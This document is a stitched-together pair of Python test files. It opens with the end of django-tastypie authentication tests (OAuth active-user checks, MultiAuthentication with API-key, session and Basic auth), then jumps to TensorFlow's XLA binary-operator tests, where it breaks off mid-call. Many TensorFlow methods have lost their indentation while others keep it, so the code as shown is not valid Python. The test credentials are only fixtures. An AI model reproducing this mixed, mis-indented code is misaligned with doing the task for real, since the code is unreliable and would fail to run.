        self.request.META['Authorization'] = 'OAuth ' + ','.join(
            [key + '=' + value for key, value in self.request.REQUEST.items()])
        resp = auth.is_authenticated(self.request)
        self.assertEqual(resp, True)
        self.assertEqual(self.request.user.pk, self.user.pk)
    def test_check_active_true(self):
        """Default require_active=True rejects the inactive user's token."""
        auth = OAuthAuthentication()
        # Valid signature but token 'bar' belongs to the inactive user.
        self.request.REQUEST = self.request.GET = {
            'oauth_consumer_key': '123',
            'oauth_nonce': 'abc',
            'oauth_signature': '&',
            'oauth_signature_method': 'PLAINTEXT',
            'oauth_timestamp': str(int(time.time())),
            'oauth_token': 'bar',
        }
        self.request.META['Authorization'] = 'OAuth ' + ','.join(
            [key + '=' + value for key, value in self.request.REQUEST.items()])
        resp = auth.is_authenticated(self.request)
        self.assertFalse(resp)
    def test_check_active_false(self):
        """require_active=False accepts the inactive user's token and binds
        request.user accordingly."""
        auth = OAuthAuthentication(require_active=False)
        # Same signed request as above, inactive user's token.
        self.request.REQUEST = self.request.GET = {
            'oauth_consumer_key': '123',
            'oauth_nonce': 'abc',
            'oauth_signature': '&',
            'oauth_signature_method': 'PLAINTEXT',
            'oauth_timestamp': str(int(time.time())),
            'oauth_token': 'bar',
        }
        self.request.META['Authorization'] = 'OAuth ' + ','.join(
            [key + '=' + value for key, value in self.request.REQUEST.items()])
        resp = auth.is_authenticated(self.request)
        self.assertTrue(resp)
        self.assertEqual(self.request.user.pk, self.user_inactive.pk)
class MultiAuthenticationTestCase(TestCase):
    """Tests for ``MultiAuthentication`` (first backend to succeed wins)."""
    # Fixture supplies the 'johndoe' user referenced below.
    fixtures = ['note_testdata.json']
    def test_apikey_and_authentication_enforce_user(self):
        """A failing backend must not clobber request.user before a later
        backend succeeds."""
        session_auth = SessionAuthentication()
        api_key_auth = ApiKeyAuthentication()
        auth = MultiAuthentication(api_key_auth, session_auth)
        john_doe = User.objects.get(username='johndoe')
        # request1: valid session only; request2: invalid api key only;
        # request3: both at once (invalid key + valid session).
        request1 = HttpRequest()
        request2 = HttpRequest()
        request3 = HttpRequest()
        request1.method = 'POST'
        request1.META = {
            'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
        }
        request1.COOKIES = {
            settings.CSRF_COOKIE_NAME: 'abcdef1234567890abcdef1234567890'
        }
        request1.user = john_doe
        request2.POST['username'] = 'janedoe'
        request2.POST['api_key'] = 'invalid key'
        request3.method = 'POST'
        request3.META = {
            'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
        }
        request3.COOKIES = {
            settings.CSRF_COOKIE_NAME: 'abcdef1234567890abcdef1234567890'
        }
        request3.user = john_doe
        request3.POST['username'] = 'janedoe'
        request3.POST['api_key'] = 'invalid key'
        # session auth should pass if since john_doe is logged in
        self.assertTrue(session_auth.is_authenticated(request1))
        # api key auth should fail because of invalid api key
        self.assertEqual(isinstance(api_key_auth.is_authenticated(request2), HttpUnauthorized), True)
        # multi auth shouldn't change users if api key auth fails
        # multi auth passes since session auth is valid
        self.assertEqual(request3.user.username, 'johndoe')
        self.assertTrue(auth.is_authenticated(request3))
        self.assertEqual(request3.user.username, 'johndoe')
    def test_apikey_and_authentication(self):
        """With a no-op Authentication() fallback, every request passes; the
        identifier reflects which backend actually authenticated it."""
        auth = MultiAuthentication(ApiKeyAuthentication(), Authentication())
        request = HttpRequest()
        john_doe = User.objects.get(username='johndoe')
        # No username/api_key details should pass.
        self.assertEqual(auth.is_authenticated(request), True)
        # The identifier should be the basic auth stock.
        self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
        # Wrong username details.
        request = HttpRequest()
        request.GET['username'] = 'foo'
        self.assertEqual(auth.is_authenticated(request), True)
        self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
        # No api_key.
        request = HttpRequest()
        request.GET['username'] = 'daniel'
        self.assertEqual(auth.is_authenticated(request), True)
        self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
        # Wrong user/api_key.
        request = HttpRequest()
        request.GET['username'] = 'daniel'
        request.GET['api_key'] = 'foo'
        self.assertEqual(auth.is_authenticated(request), True)
        self.assertEqual(auth.get_identifier(request), 'noaddr_nohost')
        # Correct user/api_key: identifier switches to the username.
        request = HttpRequest()
        request.GET['username'] = 'johndoe'
        request.GET['api_key'] = john_doe.api_key.key
        self.assertEqual(auth.is_authenticated(request), True)
        self.assertEqual(auth.get_identifier(request), 'johndoe')
    def test_apikey_and_basic_auth(self):
        """Either API-key params or HTTP Basic credentials may authenticate."""
        auth = MultiAuthentication(BasicAuthentication(), ApiKeyAuthentication())
        request = HttpRequest()
        john_doe = User.objects.get(username='johndoe')
        # No API Key or HTTP Basic auth details should fail.
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # Basic Auth still returns appropriately.
        self.assertEqual(auth.is_authenticated(request)['WWW-Authenticate'], 'Basic Realm="django-tastypie"')
        # API Key Auth works.
        request = HttpRequest()
        request.GET['username'] = 'johndoe'
        request.GET['api_key'] = john_doe.api_key.key
        self.assertEqual(auth.is_authenticated(request), True)
        self.assertEqual(auth.get_identifier(request), 'johndoe')
        # Basic Auth works.
        request = HttpRequest()
        john_doe = User.objects.get(username='johndoe')
        john_doe.set_password('pass')
        john_doe.save()
        request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % base64.b64encode('johndoe:pass'.encode('utf-8')).decode('utf-8')
        self.assertEqual(auth.is_authenticated(request), True)
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test cases for binary operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import bitwise_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import googletest
class BinaryOpsTest(xla_test.XLATestCase):
"""Test cases for binary operators."""
def _testBinary(self, op, a, b, expected, equality_test=None):
with self.cached_session() as session:
with self.test_scope():
pa = array_ops.placeholder(dtypes.as_dtype(a.dtype), a.shape, name="a")
pb = array_ops.placeholder(dtypes.as_dtype(b.dtype), b.shape, name="b")
output = op(pa, pb)
result = session.run(output, {pa: a, pb: b})
if equality_test is None:
equality_test = self.assertAllCloseAccordingToType
equality_test(result, expected, rtol=1e-3)
def _testSymmetricBinary(self, op, a, b, expected, equality_test=None):
self._testBinary(op, a, b, expected, equality_test)
self._testBinary(op, b, a, expected, equality_test)
def ListsAreClose(self, result, expected, rtol):
"""Tests closeness of two lists of floats."""
self.assertEqual(len(result), len(expected))
for i in range(len(result)):
self.assertAllCloseAccordingToType(result[i], expected[i], rtol)
  def testFloatOps(self):
    """Float binary ops: approximate_equal, real_div, pow, atan2, and the
    gradient kernels for activation/math functions."""
    for dtype in self.float_types:
      # bfloat16 is too coarse for the tighter tolerances used below.
      if dtype == dtypes.bfloat16.as_numpy_dtype:
        a = -1.01
        b = 4.1
      else:
        a = -1.001
        b = 4.01
      self._testBinary(
          lambda x, y: math_ops.approximate_equal(x, y, tolerance=0.0001),
          np.array([[[[-1, 2.00009999], [-3, b]]]], dtype=dtype),
          np.array([[[[a, 2], [-3.00009, 4]]]], dtype=dtype),
          expected=np.array([[[[False, True], [True, False]]]], dtype=dtype))
      # Division by zero yields +inf for a positive numerator.
      self._testBinary(
          gen_math_ops.real_div,
          np.array([3, 3, -1.5, -8, 44], dtype=dtype),
          np.array([2, -2, 7, -4, 0], dtype=dtype),
          expected=np.array(
              [1.5, -1.5, -0.2142857, 2, float("inf")], dtype=dtype))
      # pow: scalar/scalar, empty rhs, vector/vector, scalar broadcast both ways.
      self._testBinary(math_ops.pow, dtype(3), dtype(4), expected=dtype(81))
      self._testBinary(
          math_ops.pow,
          np.array([1, 2], dtype=dtype),
          np.zeros(shape=[0, 2], dtype=dtype),
          expected=np.zeros(shape=[0, 2], dtype=dtype))
      self._testBinary(
          math_ops.pow,
          np.array([10, 4], dtype=dtype),
          np.array([2, 3], dtype=dtype),
          expected=np.array([100, 64], dtype=dtype))
      self._testBinary(
          math_ops.pow,
          dtype(2),
          np.array([3, 4], dtype=dtype),
          expected=np.array([8, 16], dtype=dtype))
      self._testBinary(
          math_ops.pow,
          np.array([[2], [3]], dtype=dtype),
          dtype(4),
          expected=np.array([[16], [81]], dtype=dtype))
      # atan2 sweep across the quadrants.
      self._testBinary(
          math_ops.atan2,
          np.array([0, np.sqrt(2), 1, np.sqrt(2), 0], dtype),
          np.array([1, np.sqrt(2), 0, -np.sqrt(2), -1], dtype),
          expected=np.array(
              [0, np.pi / 4, np.pi / 2, np.pi * 3 / 4, np.pi], dtype=dtype))
      # Gradient kernels: first array is the op's output y, second the
      # incoming gradient dy.
      self._testBinary(
          gen_math_ops.reciprocal_grad,
          np.array([4, -3, -2, 1], dtype=dtype),
          np.array([5, -6, 7, -8], dtype=dtype),
          expected=np.array([-80, 54, -28, 8], dtype=dtype))
      self._testBinary(
          gen_math_ops.sigmoid_grad,
          np.array([4, 3, 2, 1], dtype=dtype),
          np.array([5, 6, 7, 8], dtype=dtype),
          expected=np.array([-60, -36, -14, 0], dtype=dtype))
      self._testBinary(
          gen_math_ops.rsqrt_grad,
          np.array([4, 3, 2, 1], dtype=dtype),
          np.array([5, 6, 7, 8], dtype=dtype),
          expected=np.array([-160, -81, -28, -4], dtype=dtype))
      self._testBinary(
          gen_math_ops.sqrt_grad,
          np.array([4, 3, 2, 1], dtype=dtype),
          np.array([5, 6, 7, 8], dtype=dtype),
          expected=np.array([0.625, 1, 1.75, 4], dtype=dtype))
      self._testBinary(
          gen_nn_ops.softplus_grad,
          np.array([4, 3, 2, 1], dtype=dtype),
          np.array([5, 6, 7, 8], dtype=dtype),
          expected=np.array(
              [3.97322869, 2.99258232, 1.99817801, 0.99966466], dtype=dtype))
      self._testBinary(
          gen_nn_ops.softsign_grad,
          np.array([4, 3, 2, 1], dtype=dtype),
          np.array([5, 6, 7, 8], dtype=dtype),
          expected=np.array(
              [0.11111111, 0.06122449, 0.03125, 0.01234568], dtype=dtype))
      self._testBinary(
          gen_math_ops.tanh_grad,
          np.array([4, 3, 2, 1], dtype=dtype),
          np.array([5, 6, 7, 8], dtype=dtype),
          expected=np.array([-75, -48, -21, 0], dtype=dtype))
      self._testBinary(
          gen_nn_ops.elu_grad,
          np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
          np.array([-.6, -.4, -.2, 0, .2, .4], dtype=dtype),
          expected=np.array([0.4, 1.2, 2.4, 4, 5, 6], dtype=dtype))
      self._testBinary(
          gen_nn_ops.selu_grad,
          np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
          np.array([-.6, -.4, -.2, .2, .4, .6], dtype=dtype),
          expected=np.array(
              [1.158099340847, 2.7161986816948, 4.67429802254,
               4.202803949422, 5.2535049367774, 6.30420592413], dtype=dtype))
      self._testBinary(
          gen_nn_ops.relu_grad,
          np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype=dtype),
          np.array([0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9], dtype=dtype),
          expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10], dtype=dtype))
      self._testBinary(
          gen_nn_ops.relu6_grad,
          np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=dtype),
          np.array(
              [0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9, 6.1, 10.0], dtype=dtype),
          expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10, 0, 0], dtype=dtype))
      # Cross-entropy ops return a pair (loss, backprop), hence ListsAreClose.
      self._testBinary(
          gen_nn_ops.softmax_cross_entropy_with_logits,
          np.array([[1, 2, 3, 4], [5, 6, 7, 8]], dtype=dtype),
          np.array([[0.1, 0.2, 0.3, 0.4], [0.4, 0.3, 0.2, 0.1]], dtype=dtype),
          expected=[
              np.array([1.44019, 2.44019], dtype=dtype),
              np.array([[-0.067941, -0.112856, -0.063117, 0.243914],
                        [-0.367941, -0.212856, 0.036883, 0.543914]],
                       dtype=dtype),
          ],
          equality_test=self.ListsAreClose)
      # TODO(b/68813416): Fails with bfloat16.
      if dtype != dtypes.bfloat16.as_numpy_dtype:
        # Out-of-range label (7, for 4 classes) is expected to produce NaNs.
        self._testBinary(
            gen_nn_ops.sparse_softmax_cross_entropy_with_logits,
            np.array(
                [[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8],
                 [0.9, 1.0, 1.1, 1.2]],
                dtype=dtype),
            np.array([2, 1, 7], dtype=np.int32),
            expected=[
                np.array([1.342536, 1.442536, np.nan], dtype=dtype),
                np.array(
                    [[0.213838, 0.236328, -0.738817, 0.288651], [
                        0.213838, -0.763672, 0.261183, 0.288651
                    ], [np.nan, np.nan, np.nan, np.nan]],
                    dtype=dtype),
            ],
            equality_test=self.ListsAreClose)
  def testIntOps(self):
    """Signed-int binary ops: truncate_div, bitwise and/or/xor, shifts."""
    for dtype in self.signed_int_types:
      self._testBinary(
          gen_math_ops.truncate_div,
          np.array([3, 3, -1, -9, -8], dtype=dtype),
          np.array([2, -2, 7, 2, -4], dtype=dtype),
          expected=np.array([1, -1, 0, -4, 2], dtype=dtype))
      # Bitwise ops are commutative, so each is checked in both operand orders.
      self._testSymmetricBinary(
          bitwise_ops.bitwise_and,
          np.array([0b1, 0b101, 0b1000], dtype=dtype),
          np.array([0b0, 0b101, 0b1001], dtype=dtype),
          expected=np.array([0b0, 0b101, 0b1000], dtype=dtype))
      self._testSymmetricBinary(
          bitwise_ops.bitwise_or,
          np.array([0b1, 0b101, 0b1000], dtype=dtype),
          np.array([0b0, 0b101, 0b1001], dtype=dtype),
          expected=np.array([0b1, 0b101, 0b1001], dtype=dtype))
      self._testSymmetricBinary(
          bitwise_ops.bitwise_xor,
          np.array([0b1, 0b111, 0b1100], dtype=dtype),
          np.array([0b0, 0b101, 0b1001], dtype=dtype),
          expected=np.array([0b1, 0b010, 0b0101], dtype=dtype))
      # In-range shifts must agree with NumPy.
      lhs = np.array([0, 5, 3, 14], dtype=dtype)
      rhs = np.array([5, 0, 7, 11], dtype=dtype)
      self._testBinary(
          bitwise_ops.left_shift, lhs, rhs,
          expected=np.left_shift(lhs, rhs))
      self._testBinary(
          bitwise_ops.right_shift, lhs, rhs,
          expected=np.right_shift(lhs, rhs))
      if dtype in [np.int8, np.int16, np.int32, np.int64]:
        lhs = np.array([-1, -5, -3, -14, -2], dtype=dtype)
        rhs = np.array([5, 0, 1, 11, 36], dtype=dtype)
        # HLO has saturating shift behavior: shifting a negative value by
        # >= bit-width yields its sign (-1), not an undefined result.
        bits = np.ceil(
            np.log(np.iinfo(dtype).max - np.iinfo(dtype).min) / np.log(2))
        expected = [
            np.right_shift(l, r) if r < bits else np.sign(l)
            for l, r in zip(lhs, rhs)
        ]
        self._testBinary(bitwise_ops.right_shift, lhs, rhs, expected=expected)
  def testNumericOps(self):
    """add/subtract/multiply/min/max/squared_difference/bias_add across all
    numeric dtypes, including scalar-broadcast variants."""
    for dtype in self.numeric_types:
      # add: vector/vector, scalar+vector, matrix+scalar.
      self._testBinary(
          math_ops.add,
          np.array([1, 2], dtype=dtype),
          np.array([10, 20], dtype=dtype),
          expected=np.array([11, 22], dtype=dtype))
      self._testBinary(
          math_ops.add,
          dtype(5),
          np.array([1, 2], dtype=dtype),
          expected=np.array([6, 7], dtype=dtype))
      self._testBinary(
          math_ops.add,
          np.array([[1], [2]], dtype=dtype),
          dtype(7),
          expected=np.array([[8], [9]], dtype=dtype))
      self._testBinary(
          math_ops.subtract,
          np.array([1, 2, 100], dtype=dtype),
          np.array([10, 20, -1], dtype=dtype),
          expected=np.array([-9, -18, 101], dtype=dtype))
      self._testBinary(
          math_ops.subtract,
          dtype(5),
          np.array([1, 2], dtype=dtype),
          expected=np.array([4, 3], dtype=dtype))
      self._testBinary(
          math_ops.subtract,
          np.array([[1], [2]], dtype=dtype),
          dtype(7),
          expected=np.array([[-6], [-5]], dtype=dtype))
      # min/max not supported for complex; uint8/int8 are also skipped here.
      if dtype not in self.complex_types | {np.uint8, np.int8}:
        self._testBinary(
            math_ops.maximum,
            np.array([1, 2], dtype=dtype),
            np.array([10, 20], dtype=dtype),
            expected=np.array([10, 20], dtype=dtype))
        self._testBinary(
            math_ops.maximum,
            dtype(5),
            np.array([1, 20], dtype=dtype),
            expected=np.array([5, 20], dtype=dtype))
        self._testBinary(
            math_ops.maximum,
            np.array([[10], [2]], dtype=dtype),
            dtype(7),
            expected=np.array([[10], [7]], dtype=dtype))
        self._testBinary(
            math_ops.minimum,
            np.array([1, 20], dtype=dtype),
            np.array([10, 2], dtype=dtype),
            expected=np.array([1, 2], dtype=dtype))
        self._testBinary(
            math_ops.minimum,
            dtype(5),
            np.array([1, 20], dtype=dtype),
            expected=np.array([1, 5], dtype=dtype))
        self._testBinary(
            math_ops.minimum,
            np.array([[10], [2]], dtype=dtype),
            dtype(7),
            expected=np.array([[7], [2]], dtype=dtype))
      self._testBinary(
          math_ops.multiply,
          np.array([1, 20], dtype=dtype),
          np.array([10, 2], dtype=dtype),
          expected=np.array([10, 40], dtype=dtype))
      self._testBinary(
          math_ops.multiply,
          dtype(5),
          np.array([1, 20], dtype=dtype),
          expected=np.array([5, 100], dtype=dtype))
      self._testBinary(
          math_ops.multiply,
          np.array([[10], [2]], dtype=dtype),
          dtype(7),
          expected=np.array([[70], [14]], dtype=dtype))
      # Complex support for squared_difference is incidental, see b/68205550
      if dtype not in self.complex_types | {np.uint8, np.int8}:
        self._testBinary(
            math_ops.squared_difference,
            np.array([1, 2], dtype=dtype),
            np.array([10, 20], dtype=dtype),
            expected=np.array([81, 324], dtype=dtype))
        self._testBinary(
            math_ops.squared_difference,
            dtype(5),
            np.array([1, 2], dtype=dtype),
            expected=np.array([16, 9], dtype=dtype))
        self._testBinary(
            math_ops.squared_difference,
            np.array([[1], [2]], dtype=dtype),
            dtype(7),
            expected=np.array([[36], [25]], dtype=dtype))
      # bias_add broadcasts the bias over the last dimension, rank 2 and 4.
      self._testBinary(
          nn_ops.bias_add,
          np.array([[1, 2], [3, 4]], dtype=dtype),
          np.array([2, -1], dtype=dtype),
          expected=np.array([[3, 1], [5, 3]], dtype=dtype))
      self._testBinary(
          nn_ops.bias_add,
          np.array([[[[1, 2], [3, 4]]]], dtype=dtype),
          np.array([2, -1], dtype=dtype),
          expected=np.array([[[[3, 1], [5, 3]]]], dtype=dtype))
    # 64-bit additions that overflow 32 bits, to guard against kernels
    # silently truncating to 32-bit arithmetic.
    if np.int64 in self.numeric_types:
      self._testBinary(
          math_ops.add,
          np.array([0xffffffff, 0xfffffffff, 1, 1], dtype=np.int64),
          np.array([1, 1, 0xffffffff, 0xfffffffff], dtype=np.int64),
          expected=np.array([1 << 32, 1 << 36, 1 << 32, 1 << 36],
                            dtype=np.int64))
def testComplexOps(self):
for dtype in self.complex_types:
ctypes = {np.complex64: np.float32}
self._testBinary(
math_ops.complex,
np.array([[[[-1, 2], [2, 0]]]], dtype=ctypes[dtype]),
np.array([[[[2, -3], [0, 4]]]], dtype=ctypes[dtype]),
expected=np.array([[[[-1 + 2j, 2 - 3j], [2, 4j]]]], dtype=dtype))
self._testBinary(
lambda x, y: math_ops.approximate_equal(x, y, tolerance=0.0001),
np.array(
[[[[-1 + 2j, 2.00009999 - 3j], [2 - 3j, 3 + 4.01j]]]],
dtype=dtype),
np.array(
[[[[-1.001 + 2j, 2 - 3j], [2 - 3.00009j, 3 + 4j]]]], dtype=dtype),
expected=np.array([[[[False, True], [True, False]]]], dtype=dtype))
self._testBinary(
gen_math_ops.real_div,
np.array([3, 3j, -1.5j, -8, 2 + 3j, 2 + 4j], dtype=dtype),
np.array([2, -2, 7j, -4j, 4 - 6j, 1 + 2j], dtype=dtype),
expected=np.array(
[1.5, -1.5j, -0.2142857, -2j, (2 + 3j) / (4 - 6j), 2],
dtype=dtype))
# Test inf/nan scenarios.
self._testBinary(
gen_math_ops.real_div,
np.array([4 + 3j, 4, 3j, -4, -4j, 2 - 3j], dtype=dtype),
np.array([0, 0, 0, 0, 0, 0], dtype=dtype),
expected=np.array(
[
dtype(1 + 1j) / 0,
dtype(1) / 0,
dtype(1j) / 0,
dtype(-1) / 0,
dtype(-1j) / 0,
dtype(1 - 1j) / 0
],
dtype=dtype))
self._testBinary(
math_ops.pow,
dtype(3 + 2j),
dtype(4 - 5j),
expected=np.power(dtype(3 + 2j), dtype(4 - 5j)))
self._testBinary( # empty rhs
math_ops.pow,
np.array([1 + 2j, 2 - 3j], dtype=dtype),
np.zeros(shape=[0, 2], dtype=dtype),
expected=np.zeros(shape=[0, 2], dtype=dtype))
self._testBinary( # to zero power
math_ops.pow,
np.array([1 + 2j, 2 - 3j], dtype=dtype),
np.zeros(shape=[1, 2], dtype=dtype),
expected=np.ones(shape=[1, 2], dtype=dtype))
lhs = np.array([1 - 2j, 4 + 3j, 2 - 3j, 3, 2j, 1, 4], dtype=dtype)
rhs = np.array([2, 3j, 3 + 4j, 2 + 3j, 3 - 2j, 2, 3 + 3j], dtype=dtype)
scalar = dtype(2 + 2j)
self._testBinary(math_ops.pow, lhs, rhs, expected=np.power(lhs, rhs))
self._testBinary(
math_ops.pow, scalar, rhs, expected=np.power(scalar, rhs))
self._testBinary(math_ops.pow, lhs, scalar, np.power(lhs, scalar))
lhs = np.array([4 + 2j, -3 - 1j, 2j, 1], dtype=dtype)
rhs = np.array([5, -6j, 7 - 3j, -8j], dtype=dtype)
self._testBinary(
gen_math_ops.reciprocal_grad, lhs, rhs, expected=-rhs * lhs * lhs)
self._testBinary(
gen_math_ops.sigmoid_grad, lhs, rhs, expected=rhs * lhs * (1 - lhs))
self._testBinary(
gen_math_ops.rsqrt_grad, lhs, rhs, expected=lhs**3 * rhs / -2)
self._testBinary(
gen_math_ops.sqrt_grad, lhs, rhs, expected=rhs / (2 * lhs))
self._testBinary(
gen_math_ops.tanh_grad, lhs, rhs, expected=rhs * (1 - lhs * lhs))
  def testComplexMath(self):
    """Complex add/subtract/multiply/div and bias_add, with expected values
    written as Python complex arithmetic so they track NumPy exactly."""
    for dtype in self.complex_types:
      self._testBinary(
          math_ops.add,
          np.array([1 + 3j, 2 + 7j], dtype=dtype),
          np.array([10 - 4j, 20 + 17j], dtype=dtype),
          expected=np.array([11 - 1j, 22 + 24j], dtype=dtype))
      self._testBinary(
          math_ops.add,
          dtype(5 - 7j),
          np.array([1 + 2j, 2 + 4j], dtype=dtype),
          expected=np.array([6 - 5j, 7 - 3j], dtype=dtype))
      self._testBinary(
          math_ops.add,
          np.array([[1 - 2j], [2 + 1j]], dtype=dtype),
          dtype(7 + 5j),
          expected=np.array([[8 + 3j], [9 + 6j]], dtype=dtype))
      self._testBinary(
          math_ops.subtract,
          np.array([1 + 3j, 2 + 7j], dtype=dtype),
          np.array([10 - 4j, 20 + 17j], dtype=dtype),
          expected=np.array([-9 + 7j, -18 - 10j], dtype=dtype))
      self._testBinary(
          math_ops.subtract,
          dtype(5 - 7j),
          np.array([1 + 2j, 2 + 4j], dtype=dtype),
          expected=np.array([4 - 9j, 3 - 11j], dtype=dtype))
      self._testBinary(
          math_ops.subtract,
          np.array([[1 - 2j], [2 + 1j]], dtype=dtype),
          dtype(7 + 5j),
          expected=np.array([[-6 - 7j], [-5 - 4j]], dtype=dtype))
      self._testBinary(
          math_ops.multiply,
          np.array([1 + 3j, 2 + 7j], dtype=dtype),
          np.array([10 - 4j, 20 + 17j], dtype=dtype),
          expected=np.array(
              [(1 + 3j) * (10 - 4j), (2 + 7j) * (20 + 17j)], dtype=dtype))
      self._testBinary(
          math_ops.multiply,
          dtype(5 - 7j),
          np.array([1 + 2j, 2 + 4j], dtype=dtype),
          expected=np.array(
              [(5 - 7j) * (1 + 2j), (5 - 7j) * (2 + 4j)], dtype=dtype))
      self._testBinary(
          math_ops.multiply,
          np.array([[1 - 2j], [2 + 1j]], dtype=dtype),
          dtype(7 + 5j),
          expected=np.array(
              [[(7 + 5j) * (1 - 2j)], [(7 + 5j) * (2 + 1j)]], dtype=dtype))
      self._testBinary(
          math_ops.div,
          np.array([8 - 1j, 2 + 16j], dtype=dtype),
          np.array([2 + 4j, 4 - 8j], dtype=dtype),
          expected=np.array(
              [(8 - 1j) / (2 + 4j), (2 + 16j) / (4 - 8j)], dtype=dtype))
      self._testBinary(
          math_ops.div,
          dtype(1 + 2j),
          np.array([2 + 4j, 4 - 8j], dtype=dtype),
          expected=np.array(
              [(1 + 2j) / (2 + 4j), (1 + 2j) / (4 - 8j)], dtype=dtype))
      self._testBinary(
          math_ops.div,
          np.array([2 + 4j, 4 - 8j], dtype=dtype),
          dtype(1 + 2j),
          expected=np.array(
              [(2 + 4j) / (1 + 2j), (4 - 8j) / (1 + 2j)], dtype=dtype))
      # TODO(b/68205550): math_ops.squared_difference shouldn't be supported.
      # bias_add over the last dimension, rank 2 and rank 4 inputs.
      self._testBinary(
          nn_ops.bias_add,
          np.array([[1 + 2j, 2 + 7j], [3 - 5j, 4 + 2j]], dtype=dtype),
          np.array([2 + 6j, -1 - 3j], dtype=dtype),
          expected=np.array([[3 + 8j, 1 + 4j], [5 + 1j, 3 - 1j]], dtype=dtype))
      self._testBinary(
          nn_ops.bias_add,
          np.array([[[[1 + 4j, 2 - 1j], [3 + 7j, 4]]]], dtype=dtype),
          np.array([2 + 1j, -1 + 2j], dtype=dtype),
          expected=np.array(
              [[[[3 + 5j, 1 + 1j], [5 + 8j, 3 + 2j]]]], dtype=dtype))
  def _testDivision(self, dtype):
    """Test cases for division operators.

    Exercises math_ops.div with array/array, scalar/array, and
    array/scalar (broadcast) operand combinations, plus floor_div for
    non-complex dtypes.

    Args:
      dtype: numpy dtype to run the cases under.
    """
    self._testBinary(
        math_ops.div,
        np.array([10, 20], dtype=dtype),
        np.array([10, 2], dtype=dtype),
        expected=np.array([1, 10], dtype=dtype))
    # Scalar numerator broadcast against a vector denominator.
    self._testBinary(
        math_ops.div,
        dtype(40),
        np.array([2, 20], dtype=dtype),
        expected=np.array([20, 2], dtype=dtype))
    # Column-vector numerator divided by a scalar.
    self._testBinary(
        math_ops.div,
        np.array([[10], [4]], dtype=dtype),
        dtype(2),
        expected=np.array([[5], [2]], dtype=dtype))
    if dtype not in self.complex_types:  # floordiv unsupported for complex.
      # floor_div rounds toward negative infinity (see -9 // 2 == -5).
      self._testBinary(
          gen_math_ops.floor_div,
          np.array([3, 3, -1, -9, -8], dtype=dtype),
          np.array([2, -2, 7, 2, -4], dtype=dtype),
          expected=np.array([1, -2, -1, -5, 2], dtype=dtype))
def testIntDivision(self):
for dtype in self.signed_int_types:
self._testDivision(dtype)
def testFloatDivision(self):
for dtype in self.float_types | self.complex_types:
self._testDivision(dtype)
  def _testRemainder(self, dtype):
    """Test cases for remainder operators.

    Args:
      dtype: numpy dtype to run the cases under.
    """
    # floor_mod: the result takes the sign of the divisor (-1 % 7 == 6).
    self._testBinary(
        gen_math_ops.floor_mod,
        np.array([3, 3, -1, -8], dtype=dtype),
        np.array([2, -2, 7, -4], dtype=dtype),
        expected=np.array([1, -1, 6, 0], dtype=dtype))
    # truncate_mod: the result takes the sign of the dividend (C semantics).
    self._testBinary(
        gen_math_ops.truncate_mod,
        np.array([3, 3, -1, -8], dtype=dtype),
        np.array([2, -2, 7, -4], dtype=dtype),
        expected=np.array([1, 1, -1, 0], dtype=dtype))
def testIntRemainder(self):
for dtype in self.signed_int_types - {np.int8}:
self._testRemainder(dtype)
def testFloatRemainder(self):
for dtype in self.float_types:
self._testRemainder(dtype)
def testLogicalOps(self):
self._testBinary(
math_ops.logical_and,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[False, False], [False, True]], dtype=np.bool))
self._testBinary(
math_ops.logical_or,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[True, True], [False, True]], dtype=np.bool))
  def testComparisons(self):
    """Checks elementwise comparison operators on float32 (and int64) data.

    Covers equal / not_equal / greater / greater_equal / less /
    less_equal, each with array-vs-array, scalar-vs-array, and
    column-vs-scalar (broadcast) operand shapes.  The ordering ops are
    exercised both through the math_ops wrappers and the overloaded
    Python operators.
    """
    self._testBinary(
        math_ops.equal,
        np.array([1, 5, 20], dtype=np.float32),
        np.array([10, 5, 2], dtype=np.float32),
        expected=np.array([False, True, False], dtype=np.bool))
    self._testBinary(
        math_ops.equal,
        np.float32(5),
        np.array([1, 5, 20], dtype=np.float32),
        expected=np.array([False, True, False], dtype=np.bool))
    self._testBinary(
        math_ops.equal,
        np.array([[10], [7], [2]], dtype=np.float32),
        np.float32(7),
        expected=np.array([[False], [True], [False]], dtype=np.bool))
    self._testBinary(
        math_ops.not_equal,
        np.array([1, 5, 20], dtype=np.float32),
        np.array([10, 5, 2], dtype=np.float32),
        expected=np.array([True, False, True], dtype=np.bool))
    self._testBinary(
        math_ops.not_equal,
        np.float32(5),
        np.array([1, 5, 20], dtype=np.float32),
        expected=np.array([True, False, True], dtype=np.bool))
    self._testBinary(
        math_ops.not_equal,
